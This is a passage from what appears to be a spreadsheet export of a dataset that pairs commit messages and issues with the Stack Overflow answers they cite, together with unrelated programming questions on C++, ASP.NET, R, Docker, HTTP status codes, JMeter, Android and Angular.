    m_maxSize = m_currentSize * 2; // doing this so we don't have to constantly change the array max size, we just make the max size double the current size.
    for (int i = 0; i &amp;lt; m_currentSize; i++) {
        m_baseString[i] = _other.m_baseString[i]; // changing the data in the new string to the current one.
    }
    m_baseString[m_currentSize] = '\0'; // making the last character a null terminator.
}
String::~String(){ // destructor
    delete[] m_baseString; 
}
String&amp;amp; String::WriteToConsole()
{
    std::cout &amp;lt;&amp;lt; m_baseString &amp;lt;&amp;lt; std::endl; // just outputs the m_baseString
    return *this;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;stringClass.h&lt;/p&gt;
&lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt;#pragma once
#include &amp;lt;fstream&amp;gt;
#include &amp;lt;iostream&amp;gt;
class String
{
public:
    String();        // constructor                                //#1 // DONE
    String(const char* _str);    //constructor                    //#1 // DONE
    String(const String&amp;amp; _other);                            //3 // 
    ~String();        //destructor                                //#1 // DONE
public:
    String&amp;amp; WriteToConsole();                                    //#1 // DONE
private:
    char* m_baseString = nullptr; // this is a char pointer used for the base string
    char* m_operatorEquals = nullptr;
    int m_maxSize = 0; // max size of the array
    int m_currentSize = 0; // this will check how many characters in the char array
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the &lt;code&gt;main.cpp&lt;/code&gt; where it has &lt;code&gt;file &amp;lt;&amp;lt; text.WriteToConsole() &amp;lt;&amp;lt; std::endl;&lt;/code&gt;, the &lt;code&gt;file &amp;lt;&amp;lt;&lt;/code&gt; part gives an error E0349. Do I have to use a different method to print the &lt;code&gt;*this&lt;/code&gt; pointer to the file?&lt;/p&gt;
&lt;p&gt;I expected it to write the char array/C-string to the file like it writes it to the console, but the &lt;code&gt;file &amp;lt;&amp;lt;&lt;/code&gt; part isn't working.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C738</t>
  </si>
  <si>
    <t>Component Integration Card is not loading library preload files 
I noticed bad performance on our UI Integration Cards running in SAP Work Zone due to library preload files not being loaded (no requests are made). I was able to reproduce the issue in a minimal reproducible example outside of Work Zone.
Steps to reproduce the problem:
Download component card library preload issue.zip
Serve (e.g. I'm using npm package local-web-server)
Check network trace
See no calls for preload libraries of the dependant libs defined in the manifest.json
. There seems to be a difference in how resource roots are determined between local hosted or running inside Plnkr.co. See https://stackoverflow.com/questions/76278406/card-content-failed-to-create-component</t>
  </si>
  <si>
    <t>The Component file is being searched at /Component.js, which in this case is
https://run.plnkr.co/Component.js
, but it should be
https://run.plnkr.co/preview/xK8FQdx2QBZpn4wE/Component.js
.
A simple solution to avoid the absolute path problem would be to put all the card code in its own folder
https://plnkr.co/edit/GARaxLwFYbUIAkSe
project
    card
        manifest.json
        Component.js
        ...
    index.html</t>
  </si>
  <si>
    <t xml:space="preserve">Could someone explain the difference between Software Design and Software Architecture?
More specifically; if you tell someone to present you the 'design' - what would you expect them to present? Same goes for 'architecture'. 
My current understanding is:  
Design: UML diagram/flow chart/simple wireframes (for UI) for a specific module/part of the system
Architecture: component diagram (showing how the different modules of the system communicates with each other and other systems), what language is to be used, patterns...? 
Correct me if I'm wrong. I have referred Wikipedia has articles on [external-link] and [external-link], but I'm not sure if I have understood them correctly.
</t>
  </si>
  <si>
    <t>C739</t>
  </si>
  <si>
    <t>I noticed bad performance on our UI Integration Cards running in SAP Work Zone due to library preload files not being loaded (no requests are made). I was able to reproduce the issue in a minimal reproducible example outside of Work Zone.
Steps to reproduce the problem:
Download component card library preload issue.zip
Serve (e.g. I'm using npm package local-web-server)
Check network trace
See no calls for preload libraries of the dependant libs defined in the manifest.json
P.S. This sample doesn't work in Plnkr. There seems to be a difference in how resource roots are determined between local hosted or running inside Plnkr.co. See https://stackoverflow.com/questions/76278406/card-content-failed-to-create-component</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="https://i.sstatic.net/lG0Zf4e9.png" rel="nofollow noreferrer"&gt;Click here please for image&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; [ngStyle]=&amp;quot;{'height':gridHeight,'box-shadow': 'none'}&amp;quot; class=&amp;quot;material fullscreen stripped&amp;quot;
          [columnMode]=&amp;quot;ColumnMode.force&amp;quot; [headerHeight]=&amp;quot;35&amp;quot; [footerHeight]=&amp;quot;30&amp;quot; [rowHeight]=&amp;quot;40&amp;quot; [scrollbarH]=&amp;quot;true&amp;quot;
          [rows]=&amp;quot;filteredData&amp;quot; [selectAllRowsOnPage]=&amp;quot;false&amp;quot; [loadingIndicator]=&amp;quot;loadingIndicator&amp;quot;
          [externalPaging]=&amp;quot;true&amp;quot; [count]=&amp;quot;page.totalElements&amp;quot; [offset]=&amp;quot;page.pageNumber&amp;quot; [limit]=&amp;quot;page.size&amp;quot;
          (page)=&amp;quot;setPage($event)&amp;quot; (sort)=&amp;quot;onSort($event)&amp;quot;&amp;gt;
          &amp;lt;ngx-datatable-column [maxWidth]=&amp;quot;150&amp;quot; [sortable]=&amp;quot;false&amp;quot; name=&amp;quot;Action&amp;quot;&amp;gt;
            &amp;lt;ng-template let-row=&amp;quot;row&amp;quot; ngx-datatable-cell-template&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;What I Tried:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I attempted multiple solutions to fix the row width issue in ngx-datatable, including:&lt;/p&gt;
&lt;p&gt;Setting different columnMode values like 'force', 'flex', and 'standard'.
Adding .datatable-scroller { width: 100% !important; } in styles.scss.
Checking if any parent container had overflow: hidden; or max-width restrictions.
Using ::ng-deep to override ngx-datatable styles.
Ensuring that my column definitions have a proper width value.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What I Expected:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I expected the table rows to adjust their width dynamically based on the number of columns and available space. The columns should be evenly distributed across the table width without overflowing or leaving extra empty space.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C74</t>
  </si>
  <si>
    <t>Authenticated but unauthorised users are being redirected to login page instead of 403 page. #6681
There have been several attempts by others to retain ASP.NET Core original's behaviour:
https://stackoverflow.com/questions/51027406/asp-net-boilerplate-net-core-2-0-abpauthorizationfilter-challengeresult-una</t>
  </si>
  <si>
    <t xml:space="preserve">Out of the three options, I went with option number two ( override the OnRedirectToLogin event) for the following reasons:
Minimal code introduced without duplicating an entire authorization filter to only change two lines of code.
More control of the challenge experience ( the MVC app is an OIDC client too ) with its own set of roles and permissions ( see code solution below )
At the time of this response, the OnRedirectToLogin event is only raised by the HandleChallengeAsync in the CookieAuthenticationHandler so this feels like the correct place to override the ChallengeResult behavior.
Solution:
options.Events.OnRedirectToLogin = context =&gt;
{
    if (context.HttpContext?.User?.Identity?.IsAuthenticated == false)
    {
        //The user is not authenticated... Use the "oidc" challenge scheme 
        //and send them to identity server.
        var task = context.HttpContext.ChallengeAsync("oidc");
        task.WaitAndUnwrapException();
        return Task.CompletedTask;
    }
    var accessDeniedPath = BuildRedirectUri(context.HttpContext, options.AccessDeniedPath);
    context.Response.Redirect(accessDeniedPath);
    context.Response.StatusCode = 302;
    return Task.CompletedTask;
};
Side Note:
It should be noted that the default behavior of the AbpAuthorizationFilter does not mirror the stock behavior of Asp.Net Core MVC 2.0 AuthorizeFilter. When authorization fails for an authenticated user, the Asp.Net Core MVC 2.0 AuthorizeFilter returns a Forbid result.
Asp.Net Core MVC's default AuthorizeFilter delegates the authorization to the  IPolicyEvaluator. If the authorization fails and the user is authenticated, a Forbid result is set or if the authorization fails and the user is not-authenticated, a Challenge result is set.
PolicyEvaluator.cs
var result = await _authorization.AuthorizeAsync(context.User, resource, policy);
if (result.Succeeded) 
{ 
    return PolicyAuthorizationResult.Success(); 
} 
// If authentication was successful, return forbidden, otherwise challenge 
return (authenticationResult.Succeeded)  
    ? PolicyAuthorizationResult.Forbid()  
    : PolicyAuthorizationResult.Challenge(); </t>
  </si>
  <si>
    <t xml:space="preserve">We have a simple domain model: Contact, TelephoneNumber and ContactRepository. Contact is entity, it has an identity field. TelephoneNumber is typical value object: hasn't any identity and couldn't be loaded separately from the Contact instance.
From other side we have web application for manipulating the contacts. 1st page is "ContactList", next page is "Contact/C0001" which shows the contact details and the list of telephone numbers.
We have to implement telepone numbers edit form. The first approximation thought is to add some page which will be navigable like 'ThelephoneNumber/T0001'. 
But ThelephoneNumber is is Value Object class and its instance couldn't be identified this way.
What is the best practice for resolving this issue? How can we identify non-identifieble objects in the stateless applications?
</t>
  </si>
  <si>
    <t>C740</t>
  </si>
  <si>
    <t>Refactor to process only vectors
- Prior to this commit, a row-wise comparison within the data.frame was
performed when doing the aoi check (inside the third for loop)
- this resulted in bad performance when the input df was of type tibble,
because when subsetting a tibble a tibble got returned, which resulted
that thousend of subtibbles with size 1×1 got created
- more info here: https://stackoverflow.com/q/69696700/2258480
To avoid the performance issue at any time, the function now only
accepts the df x and y column where gaze position is stored.</t>
  </si>
  <si>
    <t>The main reason is that tibbles return tibbles when subsetted, whereas dataframes sometimes return vectors.  In your example, this shows up in evaluating
df[i, "x_pos"]
, which is a tibble if
df
is a tibble, but it's a numeric scalar if
df
is a dataframe.  This makes calculations like
is.na(df[i, "x_pos"])
much slower.
You'll get a bit more speed by adding
drop = TRUE
each time you really do want a vector or scalar (I saw a 25% reduction in time taken), but a better idea is to make the conversion to a vector outside the loop to avoid all those individual accesses within the tibble.  For example this code:
start.time &lt;- Sys.time()
for (bench in 1:1000) {
  roi_vector &lt;- rep("NO EVAL", times = nrow(df))
  # loop over rows
  x_pos &lt;- df$x_pos
  y_pos &lt;- df$y_pos
  for (i in 1:nrow(df)) {
    # loop over the aoilist
    for (roi in roi_set_top$roi_list) {
      # check if either x or y is NA (or both) if so return NA
      if (is.na(x_pos[i]) || is.na(y_pos[i])) {
        roi_vector[i] &lt;- "No X/Y"
        break
      }
      # check the hit area
      if (x_pos[i] &gt;= roi$x1 &amp;&amp; y_pos[i] &gt;= roi$y1 &amp;&amp;
          x_pos[i] &lt;= roi$x2 &amp;&amp; y_pos[i] &lt;= roi$y2) {
        roi_vector[i] &lt;- roi$hit_name
        break
      }
      # Finally, if current row’s x and y is neither NA nor in hit range assign Outside ROI
      roi_vector[i] &lt;- "Outside ROI"
    }
  }
}
end.time &lt;- Sys.time()
time.taken &lt;- end.time - start.time
print(time.taken)
was about 60 times faster than your original code on my system.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to learn the new ASP .NET MVC framework and would like to know the best practice for using UserControls.
I understand that you can render UserControl's as a partial and pass data to them from a controller. Ideally I would think that it makes sense not to have a code behind file as this creates a temptation to break the MVC rules.
I'll give an example where I don't understand how UserControls fit into the pattern.
  I have a UserControl that shows the
  latest tags (much like on
  StackOverflow). Unlike StackOverflow I
  want to display this UserControl on
  all of my pages. If  I have a
  controller say QuestionController
  which is meant to handle actions from
  some question views e.g. view and
  detail, does this mean I have to fetch
  the data in the QuestionController and
  then pass it to the UserControl?
  If I create another controller say
  SearchController then I would have to
  replicate the same functionality to
  get the latest tags to pass to a
  partial again. Doesn't this mean that
  the 2 different controllers are doing
  extra things that they weren't
  originally intended to do?
</t>
  </si>
  <si>
    <t>C741</t>
  </si>
  <si>
    <t>feat(core): allow disabling identity map and change set tracking (#1307)
Sometimes we might want to disable identity map and change set tracking for some query.
This is possible via `disableIdentityMap` option. Behind the scenes, it will create new
context, load the entities inside that, and clear it afterwards, so the main identity map
will stay clean.
```ts
const users = await orm.em.find(User, { email: 'foo@bar.baz' }, {
  disableIdentityMap: true,
  populate: { cars: { brand: true } },
});
users[0].name = 'changed';
await orm.em.flush(); // calling flush have no effect, as the entity is not managed
```
&gt; Keep in mind that this can also have
&gt; [negative effect on the performance](https://stackoverflow.com/questions/9259480/entity-framework-mergeoption-notracking-bad-performance).</t>
  </si>
  <si>
    <t>If you disable change tracking by setting the
NoTracking
merge option you save the performance costs of attaching objects to the contexts but on the other hand you also lose identity management.
This means that potentially much more objects - many with the same key - will be materialized.
Example: Suppose you have a
User
entity with a
Roles
collection as navigation property. Also suppose you have 1 million users in the database and all users are in the same 10 roles, i.e. every user has a roles collection with 10 elements. If you run the following query...
var users = context.Users.Include("Roles").ToList();
...the number of materialized and instantiated objects depends on the merge option:
If you don't use
NoTracking
you will have 1.000.010 objects in memory, namely 1 million users, but only 10 roles because identity mapping will ensure that only 1 role per key is materialized and attached to the context. The same 10 role instances are used for all user's
Roles
collection.
If you use
NoTracking
however, EF won't attach objects to the context, hence identity management is disabled and you will have 11.000.000 objects in memory: 1 million users and 10 role instances per user, i.e. 10 million role objects. So, you have more than 10 times as many materialized objects as when the objects are attached to the context.
Object materialization is classified with
"moderate" performance costs
:
Operation: Materializing the objects
Relative Cost: Moderate
Frequency: Once for each object that a query returns.
Comments:
The process of reading the returned DbDataReader object and creating
objects and setting property values that are based on the values in
each instance of the DbDataRecord class.
If the object already exists
in the ObjectContext and the query uses the
AppendOnly
or
PreserveChanges
merge options, this stage does not affect performance.
In other words: If the query uses the
NoTracking
merge option, this stage
does affect performance
and it might be possible that the performance benefits of disabled change tracking are destroyed by the drawbacks of disabled identity management and multiplied object materialization.
Since EF Core 5.0 there is the additional option
'NoTrackingWithIdentityResolution'
which disables general tracking but will do identity resolution.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm trying to build the speech to text application in React Native for Android. I am using react-native-audio-recorder-player library for recording and for storage RNFS, the audio is saving in the location but the voice is not coming through, the code is given below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
import RNFS from 'react-native-fs';
import AudioRecorderPlayer, {
    AVEncoderAudioQualityIOSType,
    AVEncodingOption,
    AVModeIOSOption,
    AudioEncoderAndroidType,
    AudioSourceAndroidType,
    OutputFormatAndroidType,
} from 'react-native-audio-recorder-player';
import { useState } from 'react';
import { Platform } from 'react-native';
const audioRecorderPlayer = new AudioRecorderPlayer();
audioRecorderPlayer.setSubscriptionDuration(0.1);
const useRecording = () =&amp;gt; {
    const [recording, setRecording] = useState(false);
    const [recordingPath, setRecordingPath] = useState('');
    const audioSet = {
        AudioEncoderAndroid: AudioEncoderAndroidType.AAC,
        AudioSourceAndroid: AudioSourceAndroidType.MIC,
        AVModeIOS: AVModeIOSOption.measurement,
        AVEncoderAudioQualityKeyIOS: AVEncoderAudioQualityIOSType.high,
        AVNumberOfChannelsKeyIOS: 2,
        AVFormatIDKeyIOS: AVEncodingOption.aac,
        OutputFormatAndroid: OutputFormatAndroidType.AAC_ADTS,
    };
    const startRecording = async () =&amp;gt; {
        const dirs =
            Platform.OS === 'ios'
                ? RNFS.DocumentDirectoryPath
                : RNFS.ExternalDirectoryPath;
        console.log('dir', dirs);
        const path = Platform.select({
            ios: `${dirs}hello.m4a`,
            android: `${dirs}/hello.wav`,
        }); // File name for your recording
        console.log('Recorded File Path:', path);
        const result = await audioRecorderPlayer.startRecorder(
            path,
            audioSet,
            true,
        );
        console.log('result', result);
        setRecording(true);
        setRecordingPath(result);
    };
    const stopRecording = async () =&amp;gt; {
        const result = await audioRecorderPlayer.stopRecorder();
        setRecording(false);
    };
    return {
        startRecording,
        stopRecording,
        setRecording,
        recording,
        recordingPath,
    }
};
export default useRecording;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried but the audio is not coming through. I am expecting to listen to the audio.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C742</t>
  </si>
  <si>
    <t xml:space="preserve">WAS Features
Application Pooling
Recycling
Idle time management
Identity Management
Isolation
Sounds a lot like COM+ but hosted in IIS 7.  Anybody out there using this technology and am I correct comparing the two?
</t>
  </si>
  <si>
    <t>C743</t>
  </si>
  <si>
    <t>NodaTime : Standardize timezones for x-plat
Right now the issue is that we are using Windows TimeZones when using OC under Windows but when moving the website to a Linux/Mac system they are not having the same timezones. Different problems comes from TimeZoneInfo.GetSystemTimeZones() which could be fixed by using NodaTime.
The drawbacks of migrating mainly comes from our usage of DateTime type within Orchard everywhere. We either will need to replace all of those with NodaTime LocalTime or provide some Helper functions to convert from one to the other. Same goes with TimeZones, we need to be able to also have a helper function that will return NodaTime TimeZones to Windows TimeZones ... etc
PostgreSQL supports NodaTime types ; here are the mappings :
npgsql/npgsql#546
For SQL Server :
https://stackoverflow.com/questions/30035072/how-should-i-persist-timestamps-in-sql-db-if-app-uses-nodatime
If window's time-zones are used as Orchard's standard timezone, inevitably someone will contribute an Olson DB alternative. This will lead to having two standards and incompatibility between modules.</t>
  </si>
  <si>
    <t>A datetime2 is a perfectly acceptable and normal SQL type to store an Instant.  Use the Instant.ToDateTimeUtc method to get a DateTime, then store that in SQL as normal.  Likewise, you can use the Instant.FromDateTimeUtc method when retrieving the value from SQL.
Alternatively, you could use a SQL datetimeoffset type if you wanted to be explicit that the values are UTC based (the offset will always be zero).  There are ToDateTimeOffset and FromDateTimeOffset methods on Instant you can use.
You said:
Noda makes the case that instants can't reliably be described in UTC, since certain times never occurred in UTC.
I think perhaps you're caught up in the wording in the user guide.  I can see how it might lead you down that line of thinking.  While it's true that logically an Instant doesn't represent UTC, it certainly can be reliably described in terms of UTC.  It could also be described in some other terms, as long as those terms were unambiguous.
The point that the user guide is making is that other values that aren't in UTC could still be converted to an Instant.  For example, I might have an OffsetDateTime, or a DateTimeOffset that has a different offset than zero, and it still could be adjusted back to zero to form an Instant.  Likewise, I might have a ZonedDateTime that's assigned to the UTC time zone, or some other time zone, I can still get back to a single universal Instant without loss of fidelity.
The same cannot be said of DateTime (unless it has DateTimeKind.Utc), or of LocalDateTime, LocalDate, LocalTime, etc.  None of those are unambiguously a single instant in time.
As far as the other mappings:
Noda Time      | .NET BCL                   | SQL Server
---------------|----------------------------|------------------------------------------
Instant        | DateTime or DateTimeOffset | datetime2 or datetimeoffset
OffsetDateTime | DateTimeOffset             | datetimeoffset
LocalDateTime  | DateTime                   | datetime2
LocalDate      | DateTime                   | date
LocalTime      | TimeSpan                   | time
Duration       | TimeSpan                   | int or bigint (Ticks, TotalSeconds, etc.)
Period         | String                     | varchar
ZonedDateTime  | DateTimeOffset + String    | datetimeoffset + varchar (or a UDT)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am getting this error when exiting my application. I am using delphi 7 with ZEOSLIB 8, PostgreSQL database ver 16.&lt;/p&gt;
&lt;p&gt;The Delphi statement I use for loading blobs from database into bitbutton blobs is as follows:&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;DBtns[DCounter].Glyph.LoadFromStream(
    Datamod.tblChargeCodesgraphic.DataSet.CreateBlobStream(
        Datamod.tblChargeCodesgraphic , bmread
    ).Create
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The ZEOSLIB component method to read a blob from the the PostgreSQL database is &lt;code&gt;createblobstream&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This line of code works perfectly, but how do I close the stream with a ZEOSLIB component method? I cannot find one, and &lt;code&gt;ZConnect.CancelOperation&lt;/code&gt; does not work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C744</t>
  </si>
  <si>
    <t>Use multi-stage builds in the Dockerfile
This reduces the (uncompressed) size of the resulting Docker image from 99.3 MiB to 25.4 MiB, by starting a fresh image and only copying over the built result. A good chunk of this reduction comes from using the "distroless" base image for the final result (gcr.io/distroless/base). See also https://stackoverflow.com/q/61990871/3191 for why we're using distroless instead of alpine.
By splitting the RUN commands, it also reduces iteration time: if the contents of /whatwg/wattsi/src change, running `make docker` will no longer require reinstalling all of the build dependencies inside the container, and instead the cached image with those dependencies will be reused, with only the steps from the COPY command onward re-done. (Splitting the RUN commands in this way was avoided previously because it would increase the size of the image, but with multi-stage builds, this is not a problem. See https://stackoverflow.com/a/61975952/3191.)</t>
  </si>
  <si>
    <t>This question has come up multiple times, and this error seems to have many possible causes. Some are missing or wrong shebang instructions in any bash scripts, or Windows line endings in files copied to the volume. However, in my case, it for a different reason.
This error occurred because the built binary (/whatwg/wattsi/bin in the question) depends on the system having glibc installed. Presumably, when running, something is looking for the system's glibc, but Alpine Linux does not have glibc available. (Instead, it uses musl-libc, which is more minimal, but less popular.)
The easiest fix for this is to use a different base image that has glibc available. You could use the debian:stable-slim that you're using in the builder image (69.2 MiB), but a smaller one would be Google's Distroless base image gcr.io/distroless/base (16.9 MiB). This is still larger than alpine:latest (5.61 MiB) or the Distroless static image (1.82 MiB), but it's not bad.
There are probably other solutions, e.g. this question discusses ways to set up glibc on Alpine Linux. Or, you could figure out how to change your compiler/linker to link against the system libc (i.e., musl-libc on Alpine Linux), instead of assuming the existence of glibc specifically. But for my case, gcr.io/distroless/base worked perfectly.</t>
  </si>
  <si>
    <t xml:space="preserve">When you step back and look at ... 
the nature of animals, insects, plants and the problems they have organically solved
perhaps even the nature and balance of the universe
Have you ever been able to solve a problem by deriving an approach from nature?
I've heard of [external-link] being able to optimize supply chain amongst other things.  Also [external-link]'s being the "geometry of nature" have been applied to a wide range of problems.
Now that spring is here again and the world is coming back to life I'm wondering if anybody has some experiences they can share.
Thanks
PS I would recommend watching the "[external-link]" Nova episode on fractals.
</t>
  </si>
  <si>
    <t>C745</t>
  </si>
  <si>
    <t>DRY up rendering resources
Added some methods in the application controller that can be reused by the other controllers
when rendering resources, since most of the code was the exact same, minus the resource
name.
While doing this, I also decided to switch the response code for bad requests from 422 to 400, based on
the discussion on this article: https://stackoverflow.com/questions/16133923/400-vs-422-response-to-post-of-data.</t>
  </si>
  <si>
    <t>400 Bad Request
would now seem to be the best HTTP/1.1 status code for your use case.
At the time of your question
(and my original answer),
RFC 7231
was not a thing; at which point I objected to
400 Bad Request
because
RFC 2616
said (with emphasis mine):
The request could not be understood by the server
due to malformed syntax
.
and the request you describe is syntactically valid JSON encased in syntactically valid HTTP, and thus the server has no issues with the
syntax
of the request.
However
as pointed out by Lee Saferite in the comments
,
RFC 7231, which obsoletes RFC 2616, does not include that restriction
:
The 400 (Bad Request) status code indicates that the server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).
However,
prior to that re-wording
(or if you want to quibble about RFC 7231 only being a
proposed
standard right now),
422 Unprocessable Entity
does not seem an
incorrect
HTTP status code for your use case, because as
the introduction to RFC 4918 says:
While the status codes provided by HTTP/1.1 are sufficient to
describe most error conditions encountered by WebDAV methods, there
are some errors that do not fall neatly into the existing categories.
This specification defines extra status codes developed for WebDAV
methods (Section 11)
And
the description of
422
says:
The 422 (Unprocessable Entity) status code means the server
understands the content type of the request entity (hence a
415(Unsupported Media Type) status code is inappropriate), and the
syntax of the request entity is correct (thus a 400 (Bad Request)
status code is inappropriate) but was unable to process the contained
instructions.
(Note the reference to syntax; I suspect 7231 partly obsoletes 4918 too)
This sounds
exactly
like your situation, but just in case there was any doubt, it goes on to say:
For example, this error condition may occur if an XML
request body contains well-formed (i.e., syntactically correct), but
semantically erroneous, XML instructions.
(Replace "XML" with "JSON" and I think we can agree that's your situation)
Now, some will object that RFC 4918 is about "HTTP Extensions for Web Distributed Authoring and Versioning (WebDAV)" and that you (presumably) are doing nothing involving WebDAV so shouldn't use things from it.
Given the choice between using an error code in the original standard that explicitly doesn't cover the situation, and one from an extension that describes the situation exactly, I would choose the latter.
Furthermore,
RFC 4918 Section 21.4
refers to the
IANA Hypertext Transfer Protocol (HTTP) Status Code Registry
, where 422 can be found.
I propose that it is totally reasonable for an HTTP client or server to use any status code from that registry, so long as they do so correctly.
But as of HTTP/1.1,
RFC 7231
has traction, so just use
400 Bad Request
!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been trying to figure out a way via which I can change the value of drop down selected item + trigger a click function.&lt;/p&gt;
&lt;p&gt;I have been successful in getting the value of drop down / select menu changed.&lt;/p&gt;
&lt;p&gt;So for the select / drop down I have this code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;select id=&amp;quot;testdropdown&amp;quot; class=&amp;quot;filter-group&amp;quot; data-filter-group=&amp;quot;filtergroupone&amp;quot;&amp;gt;
      &amp;lt;option class=&amp;quot;buttontest is-checked&amp;quot; value=&amp;quot;&amp;quot;&amp;gt;Any Value&amp;lt;/option&amp;gt;
      &amp;lt;option class=&amp;quot;buttontest&amp;quot; value=&amp;quot;.test1&amp;quot;&amp;gt;Test 1&amp;lt;/option&amp;gt;
      &amp;lt;option class=&amp;quot;buttontest&amp;quot; value=&amp;quot;.test2&amp;quot;&amp;gt;Test 2&amp;lt;/option&amp;gt;
      &amp;lt;option class=&amp;quot;buttontest&amp;quot; value=&amp;quot;.test3&amp;quot;&amp;gt;Test 3&amp;lt;/option&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Post that I use jQuery to change the value like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;jQuery('#testdropdown').val('.test1');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now the issue is on change of Select I have a jQuery function. But that is not triggered when the value changes say to Test 1.&lt;/p&gt;
&lt;p&gt;I tried different options like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;jQuery('#testdropdown').selectmenu('refresh', true);
jQuery(('#testdropdown').click());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it seems to do nothing. Only the selected value shows.&lt;/p&gt;
&lt;p&gt;Basically I want a way that on value change, even a click function is triggered so that the jQuery for testdropdown on click is triggered and the required function runs.&lt;/p&gt;
&lt;p&gt;Anyway that can be done?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C746</t>
  </si>
  <si>
    <t>Add join org to load test
- This now simulates an Org with 1 founder and 4 additional members
  - Note that the founder doesn't actually participate in the normal Threads, just the setup Thread
    - It would be possible to create a normal thread for Founder, but it seems trickier than it's worth
- Add Inter-thread communication plugin
  - https://stackoverflow.com/q/53278626/2421313
  - https://www.blazemeter.com/blog/top-ten-jmeter-plugins
  - https://jmeter-plugins.org/wiki/InterThreadCommunication/
- Put 2 sharer JWTs onto the JWT_FIFO for each user that creates or joins the Org
- Pop a sharer JWT off the JWT_FIFO for each user that joins the Org
- Reuse duplicated functionality from setup Threads in normal Threads using Simple Controller to encapsulate the functionality and Module Controller to reuse it
  - https://jmeter.apache.org/usermanual/component_reference.html#Simple_Controller
  - https://jmeter.apache.org/usermanual/component_reference.html#Module_Controller
- Use an Once Only Controller for the Join Org functionality, since it will only need to happen once per user, regardless of the number of loops
  - https://jmeter.apache.org/usermanual/component_reference.html#Once_Only_Controller</t>
  </si>
  <si>
    <t>Take a look at Inter-Thread Communication Plugin - it allows synchronizing actions between different threads (even if they are in different thread groups) basing on a simple FIFO queue.
The logic would be:
When you did some action by Thread A put something into the queue using fifoPut function
Thread B will be scanning the queue and if anything comes up it will get the value and start execution of its own actions.
Check out SynchronizationExample.jmx
test plan for reference implementation.
You can install Inter-Thread Communication plugin using
JMeter Plugins Manager
Also be aware that
starting from JMeter 3.1 it's recommended to use JSR223 Test Elements and Groovy language for scripting
so kindly avoid Beanshell going forward.</t>
  </si>
  <si>
    <t xml:space="preserve">So the question is.. have you used a pre-release product or technology (a Community Technology Preview, Beta or Release Candidate, etc) to develop your own product with?
For example, you might have developed a website using Microsoft's ASP.Net MVC (which just went RTM yesterday) or built software against SQL Server 2008 RC 1..etc
If so..
1. What steps do you (or did you) take to minimise the risk of problems occuring when the pre-release product is properly released?
2. Do you wait a specific timeframe (until a product is a Release Candidate, for example) before working with a product?
3. What would be the main advantages (vs. risk) of working with pre-release technologies?
</t>
  </si>
  <si>
    <t>C747</t>
  </si>
  <si>
    <t>Checkout disclaimers (#561)
Updated strings.
Added ApiCapabilities.needsLegacyHtml and ViewUtils.html because Html.fromHtml is deprecated on 24 and above.
Added UrlUtils to reuse CustomTabsIntent logic and buildUrl for appending paths.
Updated ChromeTabsHelperActivity to fallback to opening browser if a fallback is not passed in.
Fixes bug in HelpSettingsActivity that was falling back to wrong Privacy link.
Opening custom tab when clicking on links based on this answer: // https://stackoverflow.com/a/19989677</t>
  </si>
  <si>
    <t>Based upon another answer , here's a function setTextViewHTML() which parses the links out of a HTML string and makes them clickable, and then lets you respond to the URL.
protected void makeLinkClickable(SpannableStringBuilder strBuilder, final URLSpan span)
{
    int start = strBuilder.getSpanStart(span);
    int end = strBuilder.getSpanEnd(span);
    int flags = strBuilder.getSpanFlags(span);
    ClickableSpan clickable = new ClickableSpan() {
        public void onClick(View view) {
            // Do something with span.getURL() to handle the link click...
        }
    };
    strBuilder.setSpan(clickable, start, end, flags);
    strBuilder.removeSpan(span);
}
protected void setTextViewHTML(TextView text, String html)
{
    CharSequence sequence = Html.fromHtml(html);
    SpannableStringBuilder strBuilder = new SpannableStringBuilder(sequence);
    URLSpan[] urls = strBuilder.getSpans(0, sequence.length(), URLSpan.class);   
    for(URLSpan span : urls) {
        makeLinkClickable(strBuilder, span);
    }
    text.setText(strBuilder);
    text.setMovementMethod(LinkMovementMethod.getInstance());       
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import { Component, output } from '@angular/core';
@Component({...})
export class MyComponent {
  success= output&amp;lt;{message: string, response: SomeModelNotExported}&amp;gt;;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am currently doing a &lt;strong&gt;Type extraction via indexed access and conditional inference&lt;/strong&gt;&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt; onSuccess(event: MyComponent['success'] extends OutputEmitterRef&amp;lt;infer T&amp;gt; ? T : never) { // type is inferred here as {message: string, response: SomeModelNotExported} 
    ...
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It just looks too bloody. Is there a more friendlier approach to this? Am I missing some already available types exported by Angular?&lt;/p&gt;
</t>
